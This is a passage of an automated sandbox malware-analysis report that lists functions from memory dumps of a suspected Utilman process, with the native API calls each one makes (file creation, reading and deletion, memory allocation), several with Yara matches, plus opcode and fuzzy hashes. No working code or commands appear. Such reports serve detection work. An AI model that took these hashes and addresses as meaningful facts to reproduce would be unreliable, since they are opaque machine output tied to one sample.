                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: 53a868ac99686a0820383296e2ebd591f73e125cad426cdcfe0e48020ef1f4ba
                                                                                            • Instruction ID: 317dd99c1760fcd27758259a3cb8b596fe6bf1a7a5b62367fca381595de2d10f
                                                                                            • Opcode Fuzzy Hash: 53a868ac99686a0820383296e2ebd591f73e125cad426cdcfe0e48020ef1f4ba
                                                                                            • Instruction Fuzzy Hash: 2131C5BA9103197BDB20DB64CD85FFF77BC9F44700F144458B908AA180DAB0AAD48BA1
                                                                                            Function 032293E0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(?,?,42638B06,?,?,?,?,?,?,?,?), ref: 032294DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: bab0bb821dfa4d108ce6faeabe1280697d341e5bf3f286cbdc0314a3edbf00d8
                                                                                            • Instruction ID: 243127ee15d2ddc5270265a93caf721f0279b96b84c3d58279574e8dc65487f7
                                                                                            • Opcode Fuzzy Hash: bab0bb821dfa4d108ce6faeabe1280697d341e5bf3f286cbdc0314a3edbf00d8
                                                                                            • Instruction Fuzzy Hash: E431E8B5A11248AFCB14DF99D980EDFBBB9EF8C300F108209F919A7340D770A951CBA5
                                                                                            Function 03229550 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(?,?,42638B06,?,?,?,?,?,?), ref: 03229636
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 6b474681eaee029840458f93b8e77d28fd0a2feed6c2ff264b1a9b8bdd331e55
                                                                                            • Instruction ID: d0d63b8dd2c91a7c8b9c7a93c4cbe537e3bbc5a2214bb29dfb487f5363e4d84e
                                                                                            • Opcode Fuzzy Hash: 6b474681eaee029840458f93b8e77d28fd0a2feed6c2ff264b1a9b8bdd331e55
                                                                                            • Instruction Fuzzy Hash: 9031F9B5A10249AFCB14DF99D880EEFB7B9EF88310F108219F919A7340D770A951CBA5
                                                                                            Function 03229840 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(03211FBE,?,42638B06,00000000,00000004,00003000,?,?,?,?,?,032281BE,03211FBE,0322B74E,032281BE,8B0C4D8B), ref: 03229908
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: 0a3ba71116ef5ff642394d81cd8d94bae43bc770b5dd043abb33e04c2fec5cee
                                                                                            • Instruction ID: 201325e72b85ec7e4e928f26b50ebcc0479d4b83434bacb44405250916f2b12f
                                                                                            • Opcode Fuzzy Hash: 0a3ba71116ef5ff642394d81cd8d94bae43bc770b5dd043abb33e04c2fec5cee
                                                                                            • Instruction Fuzzy Hash: EF213DB5A10259AFDB10DF99DC41EEFB7B9EF88700F104209FD19AB280D770A951CBA5
                                                                                            Function 03229640 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteFile
                                                                                            • String ID:
                                                                                            • API String ID: 4033686569-0
                                                                                            • Opcode ID: 2875a14c3a711f444044c855eb9c7ecbdd29c215752dc0ecbdd80d119122922f
                                                                                            • Instruction ID: 9eb477f5f7eedaed337a63391f28a16f4ad103b82315ffc56ebda7d6275e5d04
                                                                                            • Opcode Fuzzy Hash: 2875a14c3a711f444044c855eb9c7ecbdd29c215752dc0ecbdd80d119122922f
                                                                                            • Instruction Fuzzy Hash: 2911A075A20354BAD720EBA4CC01FAFB7ACDF85700F104209F948AB280D7B07A55C7E6
                                                                                            Function 032296E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03229717
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 081854369c831ec027b45b511c34f41f77e81ad7b19e29eddcfbdd3c68e28a6d
                                                                                            • Instruction ID: bbc212c691cbe0ea075c4aee438c9b5e0f913aeb1225b3ec0102ac7513bcd0ca
                                                                                            • Opcode Fuzzy Hash: 081854369c831ec027b45b511c34f41f77e81ad7b19e29eddcfbdd3c68e28a6d
                                                                                            • Instruction Fuzzy Hash: 5DE0463A2203147BC220EA5ACC01F9B776CDFC6710F404415FA88AB241C6B1B91587B1
                                                                                            Function 05124650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ba43c474cadffeff2e94b8728424d2b199b7ccec66df61ea8d785e2122be6b66
                                                                                            • Instruction ID: a941b6022c7f51b8b85b9d3343d1fb80406d372203642b4074170b8a8d1962c9
                                                                                            • Opcode Fuzzy Hash: ba43c474cadffeff2e94b8728424d2b199b7ccec66df61ea8d785e2122be6b66
                                                                                            • Instruction Fuzzy Hash: 3590026260250052464072584955406702597E13013D5C115B0559560C871C8955A269
                                                                                            Function 05124340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 4a84a15bd5ab094313926810dd060e0c9a8f49662eea97ce1e9ae2192b3b584d
                                                                                            • Instruction ID: 27f5289adf196baff076be75749ff57de4c5ccef1142a2981b850f69a7037be5
                                                                                            • Opcode Fuzzy Hash: 4a84a15bd5ab094313926810dd060e0c9a8f49662eea97ce1e9ae2192b3b584d
                                                                                            • Instruction Fuzzy Hash: DD900232606800229640725849D5546502597E0301B95C011F0429554C8B188A566361
                                                                                            Function 05122D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 26e2dd00d0e038e7f110c8cfef8caa8ced4429fa6cbf2d1a7c11231ccd9cb25b
                                                                                            • Instruction ID: c1a8ba2c5e238a8e2a2ef53210fed63d85c60c3d9c809690388f1deb90143746
                                                                                            • Opcode Fuzzy Hash: 26e2dd00d0e038e7f110c8cfef8caa8ced4429fa6cbf2d1a7c11231ccd9cb25b
                                                                                            • Instruction Fuzzy Hash: E090022A21340012D6807258555960A102587D1202FD5D415B001A558CCA1989696321
                                                                                            Function 05122D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 154627f528b50512b45433e6440aba33892d11c5acb808227d1f065ca9b595ef
                                                                                            • Instruction ID: 58ce106b0e19dbfee2ed60074aa955f1993abfcd660e3c2c4d3b4c945bfec2ef
                                                                                            • Opcode Fuzzy Hash: 154627f528b50512b45433e6440aba33892d11c5acb808227d1f065ca9b595ef
                                                                                            • Instruction Fuzzy Hash: 0090022230240013D640725855696065025D7E1301F95D011F0419554CDA1989566222
                                                                                            Function 05122DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 729746479ba2a8225153a441e3076e5a1bce5fd62f52a1ae0d4e2370d529533a
                                                                                            • Instruction ID: 844d29c17145c5fd1284b296b6721b5afe20d2c9a44e7131c43e1d61641604fb
                                                                                            • Opcode Fuzzy Hash: 729746479ba2a8225153a441e3076e5a1bce5fd62f52a1ae0d4e2370d529533a
                                                                                            • Instruction Fuzzy Hash: 65900222243441625A45B2584555507502697E02417D5C012B1419950C862A9956E621
                                                                                            Function 05122DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 4a36c87d17640c48018e15145edfe0dcfbd1cf30a75427aa66767666bab2e44e
                                                                                            • Instruction ID: eee40c0ec767f2d1fb0a455a31492151c2f19ddfa90e9e171542f6345f6b47b0
                                                                                            • Opcode Fuzzy Hash: 4a36c87d17640c48018e15145edfe0dcfbd1cf30a75427aa66767666bab2e44e
                                                                                            • Instruction Fuzzy Hash: 4090023220240423D61172584655707102987D0241FD5C412B0429558D975A8A52B121
                                                                                            Function 05122C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c3ae6f6404c7a56473b58c6094a65ce870606bd38889f9acef5ef393e486bec5
                                                                                            • Instruction ID: ad331884fb4684d56dcd06621af75293566e65d5acbfff9bf41cf9dd5276caaf
                                                                                            • Opcode Fuzzy Hash: c3ae6f6404c7a56473b58c6094a65ce870606bd38889f9acef5ef393e486bec5
                                                                                            • Instruction Fuzzy Hash: E890023220248812D6107258855574A102587D0301F99C411B4429658D879989917121
                                                                                            Function 05122C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 7c98f7596be423cca998e77a2c4f194a380df9ddcaba76b172d8c391461d23e2
                                                                                            • Instruction ID: 9b33ac1084da5f0272b10e1daae7b14da0ccacc3c348de1365518f7f865b9853
                                                                                            • Opcode Fuzzy Hash: 7c98f7596be423cca998e77a2c4f194a380df9ddcaba76b172d8c391461d23e2
                                                                                            • Instruction Fuzzy Hash: 2290023220240852D60072584555B46102587E0301F95C016B0129654D8719C9517521
                                                                                            Function 05122CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: f8d744b8fd862560be5603f9e09b711fac97af4fb4dc6955f5e8a62baed5dd45
                                                                                            • Instruction ID: b07f11bb9cbaf0e10af05832c182325bdb02c0b48dc445334ebf1b4cf7201097
                                                                                            • Opcode Fuzzy Hash: f8d744b8fd862560be5603f9e09b711fac97af4fb4dc6955f5e8a62baed5dd45
                                                                                            • Instruction Fuzzy Hash: 3290023220240412D60076985559646102587E0301F95D011B5029555EC76989917131
                                                                                            Function 05122F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8eda67a6711676bf309212c8f604e895ddd8900e48641e2819ad55225c91379d
                                                                                            • Instruction ID: 2602966ab41568199300913c00cc51bfb2c70f5139d489b6ab8dc431c45ace44
                                                                                            • Opcode Fuzzy Hash: 8eda67a6711676bf309212c8f604e895ddd8900e48641e2819ad55225c91379d
                                                                                            • Instruction Fuzzy Hash: A990026234240452D60072584565B061025C7E1301F95C015F1069554D871DCD527126
                                                                                            Function 05122FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: a2ae103baa2365c86b85bf19b2f91c5f19722892739bf241f843a59d1472c295
                                                                                            • Instruction ID: b55ce628868908f7648b4a05e51ebb5f060e673573037a16fb8d0a3a3365fc39
                                                                                            • Opcode Fuzzy Hash: a2ae103baa2365c86b85bf19b2f91c5f19722892739bf241f843a59d1472c295
                                                                                            • Instruction Fuzzy Hash: 5E900222602400524640726889959065025ABE1211795C121B099D550D865D89656665
                                                                                            Function 05122FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: fb5f54c9ffe04641864ab61f579284808d0c1e30ac31e9a8025d035da32d2bfa
                                                                                            • Instruction ID: a0c91b847f9185dd0c0562e24faf790b9c0af3a56d6ef5b21458472c4c796304
                                                                                            • Opcode Fuzzy Hash: fb5f54c9ffe04641864ab61f579284808d0c1e30ac31e9a8025d035da32d2bfa
                                                                                            • Instruction Fuzzy Hash: 92900222212C0052D70076684D65B07102587D0303F95C115B0159554CCA1989616521
                                                                                            Function 05122E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2993527fd0544a02f7259a0f6c87cd59d6241bf8eebe76899f2854c987cd79cd
                                                                                            • Instruction ID: d57fa958f43d4d127f07119697d48f9ab88764e00d589f8752d3c85fd90f9ac3
                                                                                            • Opcode Fuzzy Hash: 2993527fd0544a02f7259a0f6c87cd59d6241bf8eebe76899f2854c987cd79cd
                                                                                            • Instruction Fuzzy Hash: 9A90022260240512D60172584555616102A87D0241FD5C022B1029555ECB298A92B131
                                                                                            Function 05122EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 33805c058d9a0e4314d5a70e21db22bcf7017d952f67bb54e249198725862c19
                                                                                            • Instruction ID: fae3f2ac97311a1ce050f637b4edcd20d6b039840cb97f1f29e0547334fae991
                                                                                            • Opcode Fuzzy Hash: 33805c058d9a0e4314d5a70e21db22bcf7017d952f67bb54e249198725862c19
                                                                                            • Instruction Fuzzy Hash: 2990026220280413D64076584955607102587D0302F95C011B2069555E8B2D8D517135
                                                                                            Function 05122B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 1ec2d6d826f10378175f62fc350214b4c114a1dbe6458301e9c321461785810e
                                                                                            • Instruction ID: 3d482707dd8f69b75bed35baf40464969061f542f5e3494c58121e6b15323c14
                                                                                            • Opcode Fuzzy Hash: 1ec2d6d826f10378175f62fc350214b4c114a1dbe6458301e9c321461785810e
                                                                                            • Instruction Fuzzy Hash: A590026220340013460572584565616502A87E0201B95C021F1019590DC62989917125
                                                                                            Function 05122BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 39c0aed62585501d3e834ff33859630c622b148dd0f8b82a40b7e2002195139b
                                                                                            • Instruction ID: c6c12081e627aeba4b6a0f8251a0d7984858d43f74954318814d58f3d5042391
                                                                                            • Opcode Fuzzy Hash: 39c0aed62585501d3e834ff33859630c622b148dd0f8b82a40b7e2002195139b
                                                                                            • Instruction Fuzzy Hash: 6790023260640812D65072584565746102587D0301F95C011B0029654D87598B5576A1
                                                                                            Function 05122BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: f512195efd5c382fe1ed985810cb0fbdb4b829df3f7697209b1654d783090618
                                                                                            • Instruction ID: ef930d4db86366d1e97577d36a9a4d87b921d589f424424e30eda34fa21fbc40
                                                                                            • Opcode Fuzzy Hash: f512195efd5c382fe1ed985810cb0fbdb4b829df3f7697209b1654d783090618
                                                                                            • Instruction Fuzzy Hash: BC90023220240812D6807258455564A102587D1301FD5C015B002A654DCB198B5977A1
